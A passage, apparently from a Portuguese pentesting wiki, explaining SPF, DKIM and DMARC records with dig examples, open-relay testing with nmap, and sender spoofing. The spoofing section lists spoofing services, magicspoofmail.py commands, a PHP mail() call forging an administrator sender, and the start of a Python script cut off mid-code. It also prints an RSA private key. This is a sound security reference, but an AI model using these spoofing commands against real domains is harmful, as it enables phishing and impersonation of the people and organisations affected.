Um redirecionamento é um apontador para outro nome de domínio que hospeda uma política SPF, permitindo que vários domínios compartilhem a mesma política SPF. É útil ao trabalhar com uma grande quantidade de domínios que compartilham a mesma infraestrutura de e-mail.
A política SPF do domínio indicado no Mecanismo de redirecionamento será usada.
| Também é possível identificar **Qualificadores** que indicam **o que deve ser feito se um mecanismo for correspondido**. Por padrão, o **qualificador "+"** é usado (então se algum mecanismo for correspondido, isso significa que é permitido).\ Geralmente, você notará **no final de cada política SPF** algo como: **\~all** ou **-all**. Isso é usado para indicar que **se o remetente não corresponder a nenhuma política SPF, você deve marcar o e-mail como não confiável (\~) ou rejeitar (-) o e-mail.** #### Qualificadores Cada mecanismo dentro da política pode ser prefixado por um dos quatro qualificadores para definir o resultado pretendido: * **`+`**: Corresponde a um resultado PASS. Por padrão, os mecanismos assumem este qualificador, tornando `+mx` equivalente a `mx`. * **`?`**: Representa um resultado NEUTRO, tratado de forma semelhante a NENHUM (nenhuma política específica). * **`~`**: Denota SOFTFAIL, servindo como um meio-termo entre NEUTRO e FALHA. E-mails que atendem a este resultado geralmente são aceitos, mas marcados de acordo. * **`-`**: Indica FALHA, sugerindo que o e-mail deve ser rejeitado imediatamente. No exemplo a seguir, a **política SPF do google.com** é ilustrada. Observe a inclusão de políticas SPF de diferentes domínios dentro da primeira política SPF: ```shell-session dig txt google.com | grep spf google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all" dig txt _spf.google.com | grep spf ; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com ;_spf.google.com. IN TXT _spf.google.com. 235 IN TXT "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all" dig txt _netblocks.google.com | grep spf _netblocks.google.com. 1606 IN TXT "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all" dig txt _netblocks2.google.com | grep spf _netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all" dig txt _netblocks3.google.com | grep spf _netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all" ``` Tradicionalmente era possível falsificar qualquer nome de domínio que não tivesse um registro SPF correto/qualquer. **Hoje em dia**, se um **e-mail** vem de um **domínio sem um registro SPF válido**, provavelmente será **rejeitado/marcado como não confiável automaticamente**. Para verificar o SPF de um domínio, você pode usar ferramentas online como: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html) ### DKIM (DomainKeys Identified Mail) O DKIM é utilizado para assinar e-mails de saída, permitindo sua validação por Agentes de Transferência de E-mail (MTAs) externos por meio da recuperação da chave pública do domínio no DNS. Esta chave pública está localizada em um registro TXT do domínio. Para acessar esta chave, é necessário conhecer tanto o seletor quanto o nome do domínio. Por exemplo, para solicitar a chave, o nome do domínio e o seletor são essenciais. Estes podem ser encontrados no cabeçalho do e-mail `DKIM-Signature`, por exemplo, `d=gmail.com;s=20120113`. Um comando para buscar estas informações pode se parecer com: ```bash dig 20120113._domainkey.gmail.com TXT | grep p= # This command would return something like: 20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3 ``` ### DMARC (Domain-based Message Authentication, Reporting & Conformance) O DMARC melhora a segurança de e-mails baseando-se nos protocolos SPF e DKIM. Ele define políticas que orientam os servidores de e-mail no tratamento de e-mails de um domínio específico, incluindo como lidar com falhas de autenticação e para onde enviar relatórios sobre ações de processamento de e-mails. **Para obter o registro DMARC, você precisa consultar o subdomínio \_dmarc** ```bash # Reject dig _dmarc.facebook.com txt | grep DMARC _dmarc.facebook.com. 3600 IN TXT "v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100" # Quarantine dig _dmarc.google.com txt | grep DMARC _dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com" # None dig _dmarc.bing.com txt | grep DMARC _dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;" ``` #### Tags do DMARC | Nome da Tag | Propósito | Exemplo | | ----------- | ---------------------------------------------- | ------------------------------- | | v | Versão do protocolo | v=DMARC1 | | pct | Percentagem de mensagens sujeitas a filtragem | pct=20 | | ruf | URI de relatórios forenses | ruf=mailto:authfail@example.com | | rua | URI de relatórios agregados | rua=mailto:aggrep@example.com | | p | Política para o domínio organizacional | p=quarantine | | sp | Política para subdomínios do DO | sp=reject | | adkim | Modo de alinhamento para DKIM | adkim=s | | aspf | Modo de alinhamento para SPF | aspf=r | ### **E quanto aos Subdomínios?** **De** [**aqui**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\ Você precisa ter registros SPF separados para cada subdomínio do qual deseja enviar e-mails.\ O seguinte foi originalmente postado em openspf.org, que costumava ser um ótimo recurso para esse tipo de coisa. > A Questão do Demônio: E quanto aos subdomínios? > > Se eu receber um e-mail de pielovers.demon.co.uk e não houver dados SPF para pielovers, devo voltar um nível e testar o SPF para demon.co.uk? Não. Cada subdomínio no Demon é um cliente diferente, e cada cliente pode ter sua própria política. Não faria sentido a política do Demon se aplicar a todos os seus clientes por padrão; se o Demon quiser fazer isso, ele pode configurar registros SPF para cada subdomínio. > > Portanto, o conselho para os publicadores de SPF é o seguinte: você deve adicionar um registro SPF para cada subdomínio ou nome de host que tenha um registro A ou MX. > > Sites com registros A ou MX curinga também devem ter um registro SPF curinga, no formato: \* IN TXT "v=spf1 -all" Isso faz sentido - um subdomínio pode muito bem estar em uma localização geográfica diferente e ter uma definição SPF muito diferente. ### **Relé Aberto** Ao enviar e-mails, garantir que eles não sejam marcados como spam é crucial. Isso é frequentemente alcançado por meio de um **servidor de retransmissão confiável pelo destinatário**. No entanto, um desafio comum é que os administradores podem não estar totalmente cientes de quais **intervalos de IP são seguros para permitir**. Essa falta de compreensão pode levar a erros na configuração do servidor SMTP, um risco frequentemente identificado em avaliações de segurança. Uma solução alternativa que alguns administradores usam para evitar problemas de entrega de e-mails, especialmente em comunicações com clientes potenciais ou em andamento, é **permitir conexões de qualquer endereço IP**. Isso é feito configurando o parâmetro `mynetworks` do servidor SMTP para aceitar todos os endereços IP, conforme mostrado abaixo: ```bash mynetworks = 0.0.0.0/0 ``` Para verificar se um servidor de e-mail é um relay aberto (o que significa que poderia encaminhar e-mails de qualquer origem externa), a ferramenta `nmap` é comumente usada. Ela inclui um script específico projetado para testar isso. O comando para realizar uma varredura detalhada em um servidor (por exemplo, com o IP 10.10.10.10) na porta 25 usando o `nmap` é: ```bash nmap -p25 --script smtp-open-relay 10.10.10.10 -v ``` ### **Ferramentas** * [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Verifique as configurações erradas de SPF e DMARC** * [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Obtenha automaticamente as configurações de SPF e DMARC** ### Enviar E-mail Falso * [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index) * [**http://www.anonymailer.net/**](http://www.anonymailer.net) * [**https://emkei.cz/**](https://emkei.cz/) **Ou você pode usar uma ferramenta:** * [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing) ```bash # This will send a test email from test@victim.com to destination@gmail.com python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com # But you can also modify more options of the email python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com ``` {% hint style="warning" %} Se você receber algum **erro ao usar a biblioteca dkim python** para analisar a chave, sinta-se à vontade para usar a seguinte.\ **NOTA**: Esta é apenas uma correção rápida para fazer verificações rápidas em casos em que, por algum motivo, a chave privada do openssl **não pode ser analisada pelo dkim**. ``` -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1 koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq 1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf 422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ== -----END RSA PRIVATE KEY----- ``` {% endhint %} **Ou você poderia fazer isso manualmente:** {% tabs %} {% tab title="PHP" %}# Isso enviará uma mensagem não assinada
mail("seu_email@gmail.com", "Assunto de Teste!", "oi! Este é um teste", "De: administrador@vitima.com");
{% endtab %}
{% tab title="Python" %}
```python
# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py
import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""